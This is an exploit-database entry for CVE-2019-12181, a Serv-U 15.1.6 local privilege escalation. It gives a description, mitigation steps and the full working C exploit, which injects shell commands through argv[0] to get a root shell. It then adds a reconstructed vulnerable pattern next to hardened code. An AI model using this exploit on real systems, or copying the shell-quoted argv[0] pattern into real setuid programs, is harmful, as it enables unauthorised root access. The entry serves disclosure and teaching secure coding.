Vendor: Serv-U
By: Guy Levin
CVSS: 8.8 (HIGH)
Category: Privilege Escalation
CWE: 269 (Improper Privilege Management)
Product Name: Serv-U
Affected Version From: 15.1.2006
Affected Version To: Unknown
Patch Exists: YES
Related CVE: CVE-2019-12181
CPE: a:rhino-software:serv-u:15.1.6
Other Scripts:
Platforms Tested:
Year: 2019

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

This exploit lets a local, unprivileged user escalate to root on Serv-U 15.1.6. The Serv-U binary (/usr/local/Serv-U/Serv-U) is installed setuid root and, when started with the -prepareinstallation argument, builds a shell command line that embeds its own argv[0] without sanitising it. Since any caller can choose argv[0] freely through execv(), shell metacharacters placed there (a double quote to close the quoting, semicolons to chain commands) are interpreted by the shell and the injected commands run with root privileges. The vulnerability is local only: the attacker needs execute access to the setuid binary.

Mitigation:

Upgrade to a patched version of Serv-U (the issue is fixed in 15.1.7 and later) or apply the vendor-provided patch. To check whether a host is still exposed, confirm the binary is no longer setuid root: "ls -l /usr/local/Serv-U/Serv-U" shows an "s" in the owner execute position when the setuid bit is set, and the file is owned by root.

Exploit-DB raw data:

/*

CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe

*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{
    /* argv[0] is the injection vector: the setuid-root Serv-U binary embeds its
     * own (caller-supplied) argv[0] in a shell command when run with
     * -prepareinstallation. The leading '"' closes the program's quoting, the
     * ';' chain our commands, and the trailing '"' re-opens the quote so the
     * rest of the command line stays syntactically valid. execv() lets the
     * caller set argv[0] to anything. */
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here: the process image is replaced
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}
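The following is an added example, not the exploit author's code and not Serv-U's source. It is a hypothetical reconstruction of the bug class the exploit above targets (a setuid program quoting its own argv[0] into a system() command line) placed beside the hardened form a reviewer would ask for: reject untrusted argv[0] values, derive the real executable path from /proc/self/exe instead of argv[0], and run helpers with fork/execv so no shell parses the arguments. The function names build_shell_cmd, argv0_is_safe, resolve_self_path and run_without_shell and the exact format string are the example's own assumptions; only the payload string is taken from the page.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Payload from the exploit on this page: closes the quote, chains commands,
 * then re-opens the quote so the rest of the line still parses. */
static const char *PAYLOAD = "\" ; id; echo 'opening root shell' ; /bin/sh; \"";

/* VULNERABLE pattern (hypothetical reconstruction, not Serv-U's code):
 * trust argv[0] as "my own path", wrap it in double quotes and hand the result
 * to system(). Double quotes do not neutralise a value that itself contains
 * '"' and ';'. Returns 0 on success, -1 if the buffer was too small. */
int build_shell_cmd(const char *argv0, char *out, size_t n)
{
    int len = snprintf(out, n, "\"%s\" -prepareinstallation", argv0);
    return (len < 0 || (size_t)len >= n) ? -1 : 0;
}

/* Hardened check: argv[0] is attacker-chosen (execv sets it to anything), so
 * accept only an absolute path built from a conservative character set.
 * Returns 1 if the value is safe to use, 0 otherwise. */
int argv0_is_safe(const char *s)
{
    if (s == NULL || s[0] != '/')
        return 0;
    for (const char *p = s; *p; p++) {
        if (!(isalnum((unsigned char)*p) || *p == '/' || *p == '.' ||
              *p == '_' || *p == '-'))
            return 0;
    }
    return 1;
}

/* Better still: do not consult argv[0] at all. On Linux, /proc/self/exe
 * names the running binary regardless of what the caller passed.
 * Returns the path length, or -1 on failure. */
ssize_t resolve_self_path(char *out, size_t n)
{
    ssize_t len = readlink("/proc/self/exe", out, n - 1);
    if (len < 0)
        return -1;
    out[len] = '\0';
    return len;
}

/* Hardened execution: explicit argv and no shell, so metacharacters in any
 * argument are inert bytes. Returns the child's exit status or -1. */
int run_without_shell(const char *path, char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execv(path, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[512];
    if (build_shell_cmd(PAYLOAD, cmd, sizeof cmd) == 0)
        printf("vulnerable command line: %s\n", cmd); /* shown, never executed */

    printf("argv0_is_safe(payload) = %d\n", argv0_is_safe(PAYLOAD));
    printf("argv0_is_safe(\"/usr/local/Serv-U/Serv-U\") = %d\n",
           argv0_is_safe("/usr/local/Serv-U/Serv-U"));

    char self[4096];
    if (resolve_self_path(self, sizeof self) > 0)
        printf("real executable (from /proc/self/exe): %s\n", self);

    /* The same payload passed as one argv element is printed literally;
     * no shell ever sees it. */
    char *safe_argv[] = {"/bin/echo", "argument was:", (char *)PAYLOAD, NULL};
    return run_without_shell("/bin/echo", safe_argv);
}
```

Running it prints the command line the vulnerable pattern would have handed to the shell, shows that the payload fails the argv[0] check while the real install path passes, and then echoes the payload through execv where it is just an argument string. The /proc/self/exe lookup is Linux-specific; on other platforms the equivalent is the OS's own "current executable" query, never argv[0].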